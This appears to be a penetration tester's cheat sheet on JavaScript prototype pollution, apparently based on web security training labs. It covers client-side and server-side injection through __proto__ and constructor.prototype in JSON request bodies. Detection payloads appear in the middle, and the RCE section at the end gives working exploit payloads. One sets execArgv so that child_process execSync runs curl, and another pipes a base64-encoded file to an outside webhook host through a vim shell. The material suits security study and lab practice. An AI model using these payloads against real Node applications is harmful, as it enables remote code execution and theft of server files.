Prototype Pollution

Prototype pollution is a JavaScript vulnerability that enables an attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects. name.__proto__ , name['__proto__'] , name.constructor.prototype

Steps:

• Try different ways of adding an arbitrary property to Object.prototype. Try to inject an arbitrary property via the query string, URL fragment, and any JSON input. (es. __proto__[foo]=bar -> In console Object.prototype.foo)

• Identify a gadget property that allows you to execute arbitrary JavaScript.

Use DOM Invader and Server-Side Prototype Pollution Scanner.

Server Side

More difficult to detect:

• No source code access

• Lack of developer tools

• The DoS problem

• Pollution persistence

POST or PUT requests that submit JSON data to an application or API are prime candidates

POST Request

{
    "user":"wiener",
    "__proto__":{
        "foo":"bar"
    }
}

POST Request

{
    "user":"wiener",
    "constructor":{
        "prototype":{
            "foo":"bar"
        }
    }
}

Response

{
    "username":"wiener",
    "foo":"bar"
}

Detection

"__proto__": {
    "json spaces": 10
}
// raw response.

"__proto__": {
    "status": 412
}
// then trigger an error response with json body.

RCE

For identifying

"__proto__": {
    "shell":"node",
    "NODE_OPTIONS":"--inspect=webhook.com\"\".webhook\"\".com"
}

For exploit

"__proto__":{
    "execArgv": [
        "--eval=require('child_process').execSync('curl webhook')"
    ]
}
// find functionality that may spawn node child processes.

or

"__proto__":{
    "shell":"vim",
    "input":":! <command>\n"
    // ex. -> ! cat /file | base64 | curl -d @- https://webhook\n"
}
// find functionality that may spawn node child processes.